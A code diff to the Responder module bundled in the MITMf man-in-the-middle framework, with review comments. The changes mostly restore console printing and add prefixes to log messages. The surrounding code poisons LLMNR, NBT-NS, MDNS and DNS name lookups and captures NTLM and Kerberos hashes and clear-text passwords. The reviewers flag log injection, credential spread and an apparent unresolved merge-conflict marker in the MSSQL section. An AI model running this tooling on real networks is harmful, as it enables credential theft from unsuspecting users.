diff --git a/config/mitmf.cfg b/config/mitmf.cfg index fe81a8c..c67ff85 100644 --- a/config/mitmf.cfg +++ b/config/mitmf.cfg @@ -2,8 +2,7 @@ [MITMf] - #here you can set the arguments to pass to MITMf when it starts so all you need to do is run ```python mitmf.py``` - #(assuming you config file is in the default directory) + #here you can set the arguments to pass to MITMf when it starts so all you need to do is run ```python mitmf.py``` (assuming you config file is in the default directory) args='' #Required BeEF and Metasploit options diff --git a/libs/responder/Responder.py b/libs/responder/Responder.py index 2b6851f..ea5880c 100755 --- a/libs/responder/Responder.py +++ b/libs/responder/Responder.py 
@@ -291,19 +291,17 @@ class NB(BaseRequestHandler): if Is_Finger_On(Finger_On_Off): try: Finger = RunSmbFinger((self.client_address[0],445)) - Message = "%s [Analyze mode: NBT-NS] OS: %s Client Version: %s is looking for: %s Service requested is: %s"%(self.client_address[0], Finger[0], Finger[1], Name, NBT_NS_Role(data[43:46])) + Message = "[Analyze mode: NBT-NS] Host: %s is looking for : %s. Service requested is: %s.\nOs Version is: %s Client Version is: %s"%(self.client_address[0], Name,NBT_NS_Role(data[43:46]),Finger[0],Finger[1]) logger3.warning(Message) except Exception: - Message = "%s [Analyze mode: NBT-NS] is looking for : %s Service requested is: %s"%(self.client_address[0], Name,NBT_NS_Role(data[43:46])) + Message = "[Analyze mode: NBT-NS] Host: %s is looking for : %s. Service requested is: %s\n"%(self.client_address[0], Name,NBT_NS_Role(data[43:46])) logger3.warning(Message) if PrintLLMNRNBTNS(AnalyzeFilename,Message): - #print Message - logger3.warning(Message) + print Message else: - Message = "%s [Analyze mode: NBT-NS] is looking for : %s. Service requested is: %s"%(self.client_address[0], Name,NBT_NS_Role(data[43:46])) + Message = "[Analyze mode: NBT-NS] Host: %s is looking for : %s. Service requested is: %s"%(self.client_address[0], Name,NBT_NS_Role(data[43:46])) if PrintLLMNRNBTNS(AnalyzeFilename,Message): - #print Message - logger3.warning(Message) + print Message logger3.warning(Message) if RespondToSpecificHost(RespondTo) and Analyze(AnalyzeMode) == False: 
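Review bot: The restored `print Message` calls in NB's analyze-mode branch write `Name` and the `Finger[0]`/`Finger[1]` strings returned by `RunSmbFinger` to the terminal unescaped, and the new format strings add a literal `\n` to a message that also goes to `logger3`. Both values appear to come from the remote host, so newlines or control characters in them can forge extra log lines or reach the terminal as escape sequences. I would drop the embedded `\n` and escape before output, e.g. `print Message.encode('string_escape')`, assuming `Message` is a Python 2 byte string. The same pattern recurs in the later NB, LLMNR, DNS and MDNS hunks that restore `print Message` and `print '[+] OsVersion is:%s'%(Finger[0])`. The handler body starts and ends outside this hunk.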
@@ -319,17 +317,17 @@ class NB(BaseRequestHandler): Message = 'NBT-NS Answer sent to: %s. The requested name was : %s'%(self.client_address[0], Name) logging.warning(Message) if PrintLLMNRNBTNS(Log2Filename,Message): - #print Message + print Message logger2.warning(Message) if Is_Finger_On(Finger_On_Off): try: Finger = RunSmbFinger((self.client_address[0],445)) - #print '[+] OsVersion is:%s'%(Finger[0]) - #print '[+] ClientVersion is :%s'%(Finger[1]) - logging.warning('OsVersion is:%s'%(Finger[0])) - logging.warning('ClientVersion is :%s'%(Finger[1])) + print '[+] OsVersion is:%s'%(Finger[0]) + print '[+] ClientVersion is :%s'%(Finger[1]) + logging.warning('[+] OsVersion is:%s'%(Finger[0])) + logging.warning('[+] ClientVersion is :%s'%(Finger[1])) except Exception: - logging.warning('Fingerprint failed for host: %s'%(self.client_address[0])) + logging.warning('[+] Fingerprint failed for host: %s'%(self.client_address[0])) pass if RespondToSpecificName(RespondToName) and RespondToNameScope(RespondToName.upper(), Name.upper()): DnsCache.getInstance().setCustomRes(Name.lower()) 
@@ -340,17 +338,17 @@ class NB(BaseRequestHandler): Message = 'NBT-NS Answer sent to: %s. The requested name was : %s'%(self.client_address[0], Name) logging.warning(Message) if PrintLLMNRNBTNS(Log2Filename,Message): - #print Message + print Message logger2.warning(Message) if Is_Finger_On(Finger_On_Off): try: Finger = RunSmbFinger((self.client_address[0],445)) - #print '[+] OsVersion is:%s'%(Finger[0]) - #print '[+] ClientVersion is :%s'%(Finger[1]) - logging.warning('OsVersion is:%s'%(Finger[0])) - logging.warning('ClientVersion is :%s'%(Finger[1])) + print '[+] OsVersion is:%s'%(Finger[0]) + print '[+] ClientVersion is :%s'%(Finger[1]) + logging.warning('[+] OsVersion is:%s'%(Finger[0])) + logging.warning('[+] ClientVersion is :%s'%(Finger[1])) except Exception: - logging.warning('Fingerprint failed for host: %s'%(self.client_address[0])) + logging.warning('[+] Fingerprint failed for host: %s'%(self.client_address[0])) pass else: pass @@ -369,17 +367,17 @@ class NB(BaseRequestHandler): Message = 'NBT-NS Answer sent to: %s. The requested name was : %s'%(self.client_address[0], Name) logging.warning(Message) if PrintLLMNRNBTNS(Log2Filename,Message): - #print Message + print Message logger2.warning(Message) if Is_Finger_On(Finger_On_Off): try: Finger = RunSmbFinger((self.client_address[0],445)) - #print '[+] OsVersion is:%s'%(Finger[0]) - p#rint '[+] ClientVersion is :%s'%(Finger[1]) - logging.warning('OsVersion is:%s'%(Finger[0])) - logging.warning('ClientVersion is :%s'%(Finger[1])) + print '[+] OsVersion is:%s'%(Finger[0]) + print '[+] ClientVersion is :%s'%(Finger[1]) + logging.warning('[+] OsVersion is:%s'%(Finger[0])) + logging.warning('[+] ClientVersion is :%s'%(Finger[1])) except Exception: - logging.warning('Fingerprint failed for host: %s'%(self.client_address[0])) + logging.warning('[+] Fingerprint failed for host: %s'%(self.client_address[0])) pass if RespondToSpecificName(RespondToName) == False: DnsCache.getInstance().setCustomRes(Name.lower()) 
@@ -390,17 +388,17 @@ class NB(BaseRequestHandler): Message = 'NBT-NS Answer sent to: %s. The requested name was : %s'%(self.client_address[0], Name) logging.warning(Message) if PrintLLMNRNBTNS(Log2Filename,Message): - #print Message + print Message logger2.warning(Message) if Is_Finger_On(Finger_On_Off): try: Finger = RunSmbFinger((self.client_address[0],445)) - #print '[+] OsVersion is:%s'%(Finger[0]) - #print '[+] ClientVersion is :%s'%(Finger[1]) - logging.warning('OsVersion is:%s'%(Finger[0])) - logging.warning('ClientVersion is :%s'%(Finger[1])) + print '[+] OsVersion is:%s'%(Finger[0]) + print '[+] ClientVersion is :%s'%(Finger[1]) + logging.warning('[+] OsVersion is:%s'%(Finger[0])) + logging.warning('[+] ClientVersion is :%s'%(Finger[1])) except Exception: - logging.warning('Fingerprint failed for host: %s'%(self.client_address[0])) + logging.warning('[+] Fingerprint failed for host: %s'%(self.client_address[0])) pass else: pass @@ -460,17 +458,17 @@ def RAPThisDomain(Client,Domain): PDC = RapFinger(Client,Domain,"\x00\x00\x00\x80") if PDC is not None: l.append('[Analyze mode LANMAN]:') - l.append('Domain detected on this network:') + l.append('[!]Domain detected on this network:') for x in PDC: l.append(' -'+x) SQL = RapFinger(Client,Domain,"\x04\x00\x00\x00") if SQL is not None: - l.append('SQL Server detected on Domain %s:'%(Domain)) + l.append('[!]SQL Server detected on Domain %s:'%(Domain)) for x in SQL: l.append(' -'+x) WKST = RapFinger(Client,Domain,"\xff\xff\xff\xff") if WKST is not None: - l.append('Workstations/Servers detected on Domain %s:'%(Domain)) + l.append('[!]Workstations/Servers detected on Domain %s:'%(Domain)) for x in WKST: l.append(' -'+x) else: 
@@ -537,12 +535,11 @@ def BecomeBackup(data,Client): Role = NBT_NS_Role(data[45:48]) Message = "[Analyze mode: Browser]Datagram Request from IP: %s hostname: %s via the: %s wants to become a Local Master Browser Backup on this domain: %s."%(Client, Name,Role,Domain) if PrintLLMNRNBTNS(AnalyzeFilename,Message): - #print Message - logger3.warning(Message) + print Message if AnalyzeMode: Message1=RAPThisDomain(Client,Domain) if PrintLLMNRNBTNS(AnalyzeFilename,Message1): - #print Message1 + print Message1 logger3.warning(Message1) logger3.warning(Message) except: @@ -557,12 +554,11 @@ def ParseDatagramNBTNames(data,Client): Message = '[Analyze mode: Browser]Datagram Request from IP: %s hostname: %s via the: %s to: %s. Service: %s'%(Client, Name, Role1, Domain, Role2) if Role2 == "Domain controller service. This name is a domain controller." or Role2 == "Browser Election Service." or Role2 == "Local Master Browser.": if PrintLLMNRNBTNS(AnalyzeFilename,Message): - #print Message - logger3.warning(Message) + print Message if AnalyzeMode: Message1=RAPThisDomain(Client,Domain) if PrintLLMNRNBTNS(AnalyzeFilename,Message1): - #print Message1 + print Message1 logger3.warning(Message1) logger3.warning(Message) except: @@ -676,10 +672,10 @@ def ParseSMBHash(data,client): writehash = User+"::"+Domain+":"+LMHash+":"+NtHash+":"+NumChal outfile = os.path.join(ResponderPATH,"SMB-NTLMv1ESS-Client-"+client+".txt") if PrintData(outfile,User+"::"+Domain): - logging.warning("SMB-NTLMv1 hash captured from : ",client) - logging.warning("SMB complete hash is :", writehash) + print "[+]SMB-NTLMv1 hash captured from : ",client + print "[+]SMB complete hash is :", writehash WriteData(outfile,writehash,User+"::"+Domain) - logging.warning('SMB-NTLMv1 complete hash is :%s'%(writehash)) + logging.warning('[+]SMB-NTLMv1 complete hash is :%s'%(writehash)) if NthashLen > 60: outfile = os.path.join(ResponderPATH,"SMB-NTLMv2-Client-"+client+".txt") 
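Review bot: In ParseSMBHash the complete NTLMv1 response (`writehash`) now lands in three places: the per-client file via `WriteData`, stdout via the restored `print "[+]SMB complete hash is :", writehash`, and the general log via `logging.warning('[+]SMB-NTLMv1 complete hash is :%s'%(writehash))`. Credential material collected during an assessment is easier to protect and purge when it lives in one access-controlled location, so I would log only the event and the file path, e.g. `logging.warning('[+]SMB-NTLMv1 hash captured from :%s, saved to %s'%(client, outfile))`. The same applies to the NTLMv2 hunk that follows, ParseLMNTHash, the Kerberos and MSSQL handlers and ParseHTTPHash. It matters most for IsNT4ClearTxt and the Basic-auth branch of PacketSequence, which print and log clear-text passwords. ParseSMBHash continues outside the hunk.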
@@ -692,10 +688,10 @@ def ParseSMBHash(data,client): User = SSPIStart[UserOffset:UserOffset+UserLen].replace('\x00','') writehash = User+"::"+Domain+":"+NumChal+":"+NtHash[:32]+":"+NtHash[32:] if PrintData(outfile,User+"::"+Domain): - logging.warning("SMB-NTLMv2 hash captured from : ",client) - logging.warning("SMB complete hash is :", writehash) + print "[+]SMB-NTLMv2 hash captured from : ",client + print "[+]SMB complete hash is :", writehash WriteData(outfile,writehash,User+"::"+Domain) - logging.warning('SMB-NTLMv2 complete hash is :%s'%(writehash)) + logging.warning('[+]SMB-NTLMv2 complete hash is :%s'%(writehash)) #Parse SMB NTLMv1/v2 def ParseLMNTHash(data,client): 
@@ -706,33 +702,33 @@ def ParseLMNTHash(data,client): Bcc = struct.unpack(' 25: Hash = data[65+LMhashLen:65+LMhashLen+NthashLen] - logging.warning('SMB-NTLMv2 hash captured from :%s'%(client)) + logging.warning('[+]SMB-NTLMv2 hash captured from :%s'%(client)) outfile = os.path.join(ResponderPATH,"SMB-NTLMv2-Client-"+client+".txt") pack = tuple(data[89+NthashLen:].split('\x00\x00\x00'))[:2] var = [e.replace('\x00','') for e in data[89+NthashLen:Bcc+60].split('\x00\x00\x00')[:2]] Username, Domain = tuple(var) Writehash = Username+"::"+Domain+":"+NumChal+":"+Hash.encode('hex')[:32].upper()+":"+Hash.encode('hex')[32:].upper() if PrintData(outfile,Username+"::"+Domain): - logging.warning("SMB-NTLMv2 hash captured from :",client) - logging.warning("SMB-NTLMv2 complete hash is :",Writehash) + print "[+]SMB-NTLMv2 hash captured from :",client + print "[+]SMB-NTLMv2 complete hash is :",Writehash ParseShare(data) WriteData(outfile,Writehash, Username+"::"+Domain) - logging.warning('SMB-NTLMv2 complete hash is :%s'%(Writehash)) + logging.warning('[+]SMB-NTLMv2 complete hash is :%s'%(Writehash)) if NthashLen == 24: - logging.warning('SMB-NTLMv1 hash captured from :%s'%(client)) + logging.warning('[+]SMB-NTLMv1 hash captured from :%s'%(client)) outfile = os.path.join(ResponderPATH,"SMB-NTLMv1-Client-"+client+".txt") pack = tuple(data[89+NthashLen:].split('\x00\x00\x00'))[:2] var = [e.replace('\x00','') for e in data[89+NthashLen:Bcc+60].split('\x00\x00\x00')[:2]] Username, Domain = tuple(var) writehash = Username+"::"+Domain+":"+data[65:65+LMhashLen].encode('hex').upper()+":"+data[65+LMhashLen:65+LMhashLen+NthashLen].encode('hex').upper()+":"+NumChal if PrintData(outfile,Username+"::"+Domain): - logging.warning("SMB-NTLMv1 hash captured from : ",client) - logging.warning("SMB complete hash is :", writehash) + print "[+]SMB-NTLMv1 hash captured from : ",client + print "[+]SMB complete hash is :", writehash ParseShare(data) WriteData(outfile,writehash, Username+"::"+Domain) - 
logging.warning('SMB-NTLMv1 complete hash is :%s'%(writehash)) - logging.warning('SMB-NTLMv1 Username:%s'%(Username)) - logging.warning('SMB-NTLMv1 Domain (if joined, if not then computer name) :%s'%(Domain)) + logging.warning('[+]SMB-NTLMv1 complete hash is :%s'%(writehash)) + logging.warning('[+]SMB-NTLMv1 Username:%s'%(Username)) + logging.warning('[+]SMB-NTLMv1 Domain (if joined, if not then computer name) :%s'%(Domain)) except Exception: raise @@ -748,7 +744,7 @@ def IsNT4ClearTxt(data): if PassLen > 2: Password = data[HeadLen+30:HeadLen+30+PassLen].replace("\x00","") User = ''.join(tuple(data[HeadLen+30+PassLen:].split('\x00\x00\x00'))[:1]).replace("\x00","") - #print "[SMB]Clear Text Credentials: %s:%s" %(User,Password) + print "[SMB]Clear Text Credentials: %s:%s" %(User,Password) logging.warning("[SMB]Clear Text Credentials: %s:%s"%(User,Password)) #SMB Server class, NTLMSSP @@ -989,11 +985,11 @@ class KerbTCP(BaseRequestHandler): if KerbHash: Outfile = os.path.join(ResponderPATH,"MSKerberos-Client-"+self.client_address[0]+".txt") if PrintData(Outfile,KerbHash): - logging.warning("MSKerbv5 hash captured from : ", self.client_address[0]) - #print "[+]MSKerbv5 complete hash is :", KerbHash + print "[+]MSKerbv5 hash captured from : ", self.client_address[0] + print "[+]MSKerbv5 complete hash is :", KerbHash Outfile = os.path.join(ResponderPATH,"MSKerberos-Client-"+self.client_address[0]+".txt") WriteData(Outfile,KerbHash, KerbHash) - logging.warning('MSKerbv5 complete hash is :%s'%(KerbHash)) + logging.warning('[+]MSKerbv5 complete hash is :%s'%(KerbHash)) except Exception: raise 
@@ -1006,11 +1002,11 @@ class KerbUDP(BaseRequestHandler): if KerbHash: Outfile = os.path.join(ResponderPATH,"MSKerberos-Client-"+self.client_address[0]+".txt") if PrintData(Outfile,KerbHash): - logging.warning("MSKerbv5 hash captured from : ", self.client_address[0]) - #print "[+]MSKerbv5 complete hash is :", KerbHash + print "[+]MSKerbv5 hash captured from : ", self.client_address[0] + print "[+]MSKerbv5 complete hash is :", KerbHash Outfile = os.path.join(ResponderPATH,"MSKerberos-Client-"+self.client_address[0]+".txt") WriteData(Outfile,KerbHash, KerbHash) - logging.warning('MSKerbv5 complete hash is :%s'%(KerbHash)) + logging.warning('[+]MSKerbv5 complete hash is :%s'%(KerbHash)) except Exception: raise 
@@ -1037,13 +1033,13 @@ def ParseSQLHash(data,client): User = SSPIStart[UserOffset:UserOffset+UserLen].replace('\x00','') outfile = os.path.join(ResponderPATH,"MSSQL-NTLMv1-Client-"+client+".txt") if PrintData(outfile,User+"::"+Domain): - logging.warning("MSSQL NTLMv1 hash captured from :",client) - logging.warning('MSSQL NTLMv1 Complete hash is: %s'%(User+"::"+Domain+":"+LMHash+":"+NtHash+":"+NumChal)) + print "[+]MSSQL NTLMv1 hash captured from :",client + print '[+]MSSQL NTLMv1 Complete hash is: %s'%(User+"::"+Domain+":"+LMHash+":"+NtHash+":"+NumChal) WriteData(outfile,User+"::"+Domain+":"+LMHash+":"+NtHash+":"+NumChal, User+"::"+Domain) - logging.warning('MsSQL NTLMv1 hash captured from :%s'%(client)) - logging.warning('MSSQL NTLMv1 User is :%s'%(SSPIStart[UserOffset:UserOffset+UserLen].replace('\x00',''))) - logging.warning('MSSQL NTLMv1 Domain is :%s'%(Domain)) - logging.warning('MSSQL NTLMv1 Complete hash is: %s'%(User+"::"+Domain+":"+LMHash+":"+NtHash+":"+NumChal)) + logging.warning('[+]MsSQL NTLMv1 hash captured from :%s'%(client)) + logging.warning('[+]MSSQL NTLMv1 User is :%s'%(SSPIStart[UserOffset:UserOffset+UserLen].replace('\x00',''))) + logging.warning('[+]MSSQL NTLMv1 Domain is :%s'%(Domain)) + logging.warning('[+]MSSQL NTLMv1 Complete hash is: %s'%(User+"::"+Domain+":"+LMHash+":"+NtHash+":"+NumChal)) if NthashLen > 60: DomainLen = struct.unpack('>>>>>> parent of cd9a16d... fixed Responder plugin output WriteData(outfile,UserName+":"+PwdStr,UserName+":"+PwdStr) - logging.warning('MSSQL PlainText Password captured from :%s'%(client)) - logging.warning('MSSQL Username: %s Password: %s'%(UserName, PwdStr)) + logging.warning('[+]MSSQL PlainText Password captured from :%s'%(client)) + logging.warning('[+]MSSQL Username: %s Password: %s'%(UserName, PwdStr)) def ParsePreLoginEncValue(Data): 
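Review bot: The text `>>>>>> parent of cd9a16d... fixed Responder plugin output` in the MSSQL section looks like the tail of an unresolved merge-conflict marker committed into Responder.py. Part of this hunk is missing from the page, so it cannot be confirmed here that the marker sits on an added line. The line offset does shift from -4 at `@@ -1037,13 +1033,13 @@` to +1 at `@@ -1194,7 +1195,7 @@`, which is consistent with marker lines having been added in between. A conflict marker inside a Python module is a syntax error at import time, so the file should be searched for `<<<<<<<`, `=======` and `>>>>>>>` and the conflict resolved before this lands.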
@@ -1194,7 +1195,7 @@ def IsICMPRedirectPlausible(IP): dnsip.extend(ip[1:]) for x in dnsip: if x !="127.0.0.1" and IsOnTheSameSubnet(x,IP) == False: - print "| |_ [Analyze mode: ICMP] You can ICMP Redirect on this network. This workstation (%s) is not on the same subnet than the DNS server (%s). Use python Icmp-Redirect.py for more details."%(IP, x) + print "[Analyze mode: ICMP] You can ICMP Redirect on this network. This workstation (%s) is not on the same subnet than the DNS server (%s). Use python Icmp-Redirect.py for more details."%(IP, x) else: pass @@ -1223,16 +1224,17 @@ class LLMNR(BaseRequestHandler): if Is_Finger_On(Finger_On_Off): try: Finger = RunSmbFinger((self.client_address[0],445)) - Message = "%s [Analyze mode: LLMNR] OS: %s Client Version: %s is looking for : %s"%(self.client_address[0],Finger[0],Finger[1],Name) + Message = "[Analyze mode: LLMNR] Host: %s is looking for : %s.\nOs Version is: %s Client Version is: %s"%(self.client_address[0], Name,Finger[0],Finger[1]) logger3.warning(Message) except Exception: - Message = "%s [Analyze mode: LLMNR] is looking for : %s."%(self.client_address[0], Name) + Message = "[Analyze mode: LLMNR] Host: %s is looking for : %s."%(self.client_address[0], Name) logger3.warning(Message) if PrintLLMNRNBTNS(AnalyzeFilename,Message): - logger3.warning(Message) + print Message else: Message = "[Analyze mode: LLMNR] Host: %s is looking for : %s."%(self.client_address[0], Name) if PrintLLMNRNBTNS(AnalyzeFilename,Message): + print Message logger3.warning(Message) if DontRespondToSpecificHost(DontRespondTo): 
@@ -1254,17 +1256,17 @@ class LLMNR(BaseRequestHandler): Message = "LLMNR poisoned answer sent to this IP: %s. The requested name was : %s."%(self.client_address[0],Name) logging.warning(Message) if PrintLLMNRNBTNS(Log2Filename,Message): - #print Message + print Message logger2.warning(Message) if Is_Finger_On(Finger_On_Off): try: Finger = RunSmbFinger((self.client_address[0],445)) - #print '[+] OsVersion is:%s'%(Finger[0]) - #print '[+] ClientVersion is :%s'%(Finger[1]) - logging.warning('OsVersion is:%s'%(Finger[0])) - logging.warning('ClientVersion is :%s'%(Finger[1])) + print '[+] OsVersion is:%s'%(Finger[0]) + print '[+] ClientVersion is :%s'%(Finger[1]) + logging.warning('[+] OsVersion is:%s'%(Finger[0])) + logging.warning('[+] ClientVersion is :%s'%(Finger[1])) except Exception: - logging.warning('Fingerprint failed for host: %s'%(self.client_address[0])) + logging.warning('[+] Fingerprint failed for host: %s'%(self.client_address[0])) pass if RespondToSpecificName(RespondToName) and RespondToNameScope(RespondToName.upper(), Name.upper()): 
@@ -1276,17 +1278,17 @@ class LLMNR(BaseRequestHandler): Message = "LLMNR poisoned answer sent to this IP: %s. The requested name was : %s."%(self.client_address[0],Name) logging.warning(Message) if PrintLLMNRNBTNS(Log2Filename,Message): - #print Message + print Message logger2.warning(Message) if Is_Finger_On(Finger_On_Off): try: Finger = RunSmbFinger((self.client_address[0],445)) - #print '[+] OsVersion is:%s'%(Finger[0]) - #print '[+] ClientVersion is :%s'%(Finger[1]) - logging.warning('OsVersion is:%s'%(Finger[0])) - logging.warning('ClientVersion is :%s'%(Finger[1])) + print '[+] OsVersion is:%s'%(Finger[0]) + print '[+] ClientVersion is :%s'%(Finger[1]) + logging.warning('[+] OsVersion is:%s'%(Finger[0])) + logging.warning('[+] ClientVersion is :%s'%(Finger[1])) except Exception: - logging.warning('Fingerprint failed for host: %s'%(self.client_address[0])) + logging.warning('[+] Fingerprint failed for host: %s'%(self.client_address[0])) pass if Analyze(AnalyzeMode) == False and RespondToSpecificHost(RespondTo) == False: 
@@ -1298,17 +1300,17 @@ class LLMNR(BaseRequestHandler): for x in range(1): soc.sendto(str(buff), self.client_address) if PrintLLMNRNBTNS(Log2Filename,Message): - #print Message + print Message logger2.warning(Message) if Is_Finger_On(Finger_On_Off): try: Finger = RunSmbFinger((self.client_address[0],445)) - #print '[+] OsVersion is:%s'%(Finger[0]) - #print '[+] ClientVersion is :%s'%(Finger[1]) - logging.warning('OsVersion is:%s'%(Finger[0])) - logging.warning('ClientVersion is :%s'%(Finger[1])) + print '[+] OsVersion is:%s'%(Finger[0]) + print '[+] ClientVersion is :%s'%(Finger[1]) + logging.warning('[+] OsVersion is:%s'%(Finger[0])) + logging.warning('[+] ClientVersion is :%s'%(Finger[1])) except Exception: - logging.warning('Fingerprint failed for host: %s'%(self.client_address[0])) + logging.warning('[+] Fingerprint failed for host: %s'%(self.client_address[0])) pass if RespondToSpecificName(RespondToName) == False: buff = LLMNRAns(Tid=data[0:2],QuestionName=Name, AnswerName=Name) @@ -1318,17 +1320,17 @@ class LLMNR(BaseRequestHandler): for x in range(1): soc.sendto(str(buff), self.client_address) if PrintLLMNRNBTNS(Log2Filename,Message): - #print Message + print Message logger2.warning(Message) if Is_Finger_On(Finger_On_Off): try: Finger = RunSmbFinger((self.client_address[0],445)) - #print '[+] OsVersion is:%s'%(Finger[0]) - #print '[+] ClientVersion is :%s'%(Finger[1]) - logging.warning('OsVersion is:%s'%(Finger[0])) - logging.warning('ClientVersion is :%s'%(Finger[1])) + print '[+] OsVersion is:%s'%(Finger[0]) + print '[+] ClientVersion is :%s'%(Finger[1]) + logging.warning('[+] OsVersion is:%s'%(Finger[0])) + logging.warning('[+] ClientVersion is :%s'%(Finger[1])) except Exception: - logging.warning('Fingerprint failed for host: %s'%(self.client_address[0])) + logging.warning('[+] Fingerprint failed for host: %s'%(self.client_address[0])) pass else: pass 
@@ -1385,7 +1387,7 @@ class DNS(BaseRequestHandler): buff = DNSAns() buff.calculate(data) soc.sendto(str(buff), self.client_address) - #print "DNS Answer sent to: %s "%(self.client_address[0]) + print "DNS Answer sent to: %s "%(self.client_address[0]) logging.warning('DNS Answer sent to: %s'%(self.client_address[0])) class DNSTCP(BaseRequestHandler): @@ -1399,7 +1401,7 @@ class DNSTCP(BaseRequestHandler): buff = DNSAns() buff.calculate(data) self.request.send(str(buff)) - #print "DNS Answer sent to: %s "%(self.client_address[0]) + print "DNS Answer sent to: %s "%(self.client_address[0]) logging.warning('DNS Answer sent to: %s'%(self.client_address[0])) except Exception: @@ -1454,14 +1456,14 @@ class MDNS(BaseRequestHandler): try: if Analyze(AnalyzeMode): if Parse_IPV6_Addr(data): - #print '[Analyze mode: MDNS] Host: %s is looking for : %s'%(self.client_address[0],Parse_MDNS_Name(data)) + print '[Analyze mode: MDNS] Host: %s is looking for : %s'%(self.client_address[0],Parse_MDNS_Name(data)) logging.warning('[Analyze mode: MDNS] Host: %s is looking for : %s'%(self.client_address[0],Parse_MDNS_Name(data))) if RespondToSpecificHost(RespondTo): if Analyze(AnalyzeMode) == False: if RespondToIPScope(RespondTo, self.client_address[0]): if Parse_IPV6_Addr(data): - #print 'MDNS poisoned answer sent to this IP: %s. The requested name was : %s'%(self.client_address[0],Parse_MDNS_Name(data)) + print 'MDNS poisoned answer sent to this IP: %s. The requested name was : %s'%(self.client_address[0],Parse_MDNS_Name(data)) logging.warning('MDNS poisoned answer sent to this IP: %s. The requested name was : %s'%(self.client_address[0],Parse_MDNS_Name(data))) Name = Poisoned_MDNS_Name(data) MDns = MDNSAns(AnswerName = Name) 
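Review bot: In the MDNS handler each restored `print` repeats the whole format expression of the `logging.warning` call below it, including a second `Parse_MDNS_Name(data)` call on the same packet. Building the string once keeps the two outputs from drifting apart, as the NB and LLMNR handlers already do with `Message`: `Message = '[Analyze mode: MDNS] Host: %s is looking for : %s'%(self.client_address[0],Parse_MDNS_Name(data))`, then `print Message` and `logging.warning(Message)`. The same applies to the two "MDNS poisoned answer sent" pairs here and in the next hunk. The handler method begins and ends outside the hunk.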
@@ -1470,7 +1472,7 @@ class MDNS(BaseRequestHandler): if Analyze(AnalyzeMode) == False and RespondToSpecificHost(RespondTo) == False: if Parse_IPV6_Addr(data): - #print 'MDNS poisoned answer sent to this IP: %s. The requested name was : %s'%(self.client_address[0],Parse_MDNS_Name(data)) + print 'MDNS poisoned answer sent to this IP: %s. The requested name was : %s'%(self.client_address[0],Parse_MDNS_Name(data)) logging.warning('MDNS poisoned answer sent to this IP: %s. The requested name was : %s'%(self.client_address[0],Parse_MDNS_Name(data))) Name = Poisoned_MDNS_Name(data) MDns = MDNSAns(AnswerName = Name) @@ -1506,14 +1508,14 @@ def ParseHTTPHash(data,client): outfile = os.path.join(ResponderPATH,"HTTP-NTLMv1-Client-"+client+".txt") WriteHash = User+"::"+Hostname+":"+LMHash+":"+NtHash+":"+NumChal if PrintData(outfile,User+"::"+Hostname): - #print "[+]HTTP NTLMv1 hash captured from :",client - #print "Hostname is :", Hostname - #print "Complete hash is : ", WriteHash + print "[+]HTTP NTLMv1 hash captured from :",client + print "Hostname is :", Hostname + print "Complete hash is : ", WriteHash WriteData(outfile,WriteHash, User+"::"+Hostname) - logging.warning('HTTP NTLMv1 hash captured from :%s'%(client)) - logging.warning('HTTP NTLMv1 Hostname is :%s'%(Hostname)) - logging.warning('HTTP NTLMv1 User is :%s'%(data[UserOffset:UserOffset+UserLen].replace('\x00',''))) - logging.warning('HTTP NTLMv1 Complete hash is :%s'%(WriteHash)) + logging.warning('[+]HTTP NTLMv1 hash captured from :%s'%(client)) + logging.warning('[+]HTTP NTLMv1 Hostname is :%s'%(Hostname)) + logging.warning('[+]HTTP NTLMv1 User is :%s'%(data[UserOffset:UserOffset+UserLen].replace('\x00',''))) + logging.warning('[+]HTTP NTLMv1 Complete hash is :%s'%(WriteHash)) if NthashLen > 24: NthashLen = 64 
@@ -1529,19 +1531,19 @@ def ParseHTTPHash(data,client): outfile = os.path.join(ResponderPATH,"HTTP-NTLMv2-Client-"+client+".txt") WriteHash = User+"::"+Domain+":"+NumChal+":"+NTHash[:32]+":"+NTHash[32:] if PrintData(outfile,User+"::"+Domain): - logging.warning("HTTP NTLMv2 hash captured from :",client) - logging.warning("Complete hash is : ", WriteHash) + print "[+]HTTP NTLMv2 hash captured from :",client + print "Complete hash is : ", WriteHash WriteData(outfile,WriteHash, User+"::"+Domain) - logging.warning('HTTP NTLMv2 hash captured from :%s'%(client)) - logging.warning('HTTP NTLMv2 User is : %s'%(User)) - logging.warning('HTTP NTLMv2 Domain is :%s'%(Domain)) - logging.warning('HTTP NTLMv2 Hostname is :%s'%(HostName)) - logging.warning('HTTP NTLMv2 Complete hash is :%s'%(WriteHash)) + logging.warning('[+]HTTP NTLMv2 hash captured from :%s'%(client)) + logging.warning('[+]HTTP NTLMv2 User is : %s'%(User)) + logging.warning('[+]HTTP NTLMv2 Domain is :%s'%(Domain)) + logging.warning('[+]HTTP NTLMv2 Hostname is :%s'%(HostName)) + logging.warning('[+]HTTP NTLMv2 Complete hash is :%s'%(WriteHash)) def GrabCookie(data,host): Cookie = re.search('(Cookie:*.\=*)[^\r\n]*', data) if Cookie: - CookieStr = "HTTP Cookie Header sent from: %s The Cookie is: \n%s"%(host,Cookie.group(0)) + CookieStr = "[+]HTTP Cookie Header sent from: %s The Cookie is: \n%s"%(host,Cookie.group(0)) logging.warning(CookieStr) return Cookie.group(0) else: @@ -1572,7 +1574,7 @@ def Basic_Ntlm(Basic): return IIS_Auth_401_Ans() def ServeEXE(data,client, Filename): - Message = "Sent %s file sent to: %s."%(Filename,client) + Message = "[+]Sent %s file sent to: %s."%(Filename,client) logging.warning(Message) with open (Filename, "rb") as bk: data = bk.read() 
@@ -1603,17 +1605,17 @@ def GrabURL(data, host): POST = re.findall('(?<=POST )[^HTTP]*', data) POSTDATA = re.findall('(?<=\r\n\r\n)[^*]*', data) if GET: - HostStr = "HTTP GET request from : %s. The HTTP URL requested was: %s"%(host, ''.join(GET)) + HostStr = "[+]HTTP GET request from : %s. The HTTP URL requested was: %s"%(host, ''.join(GET)) logging.warning(HostStr) - #print HostStr + print HostStr if POST: - Host3Str = "HTTP POST request from : %s. The HTTP URL requested was: %s"%(host,''.join(POST)) + Host3Str = "[+]HTTP POST request from : %s. The HTTP URL requested was: %s"%(host,''.join(POST)) logging.warning(Host3Str) - #print Host3Str + print Host3Str if len(''.join(POSTDATA)) >2: - PostData = 'The HTTP POST DATA in this request was: %s'%(''.join(POSTDATA).strip()) - #print PostData + PostData = '[+]The HTTP POST DATA in this request was: %s'%(''.join(POSTDATA).strip()) + print PostData logging.warning(PostData) #Handle HTTP packet sequence. @@ -1652,10 +1654,9 @@ def PacketSequence(data,client): NTLM_Auth= b64decode(''.join(Ntlm)) 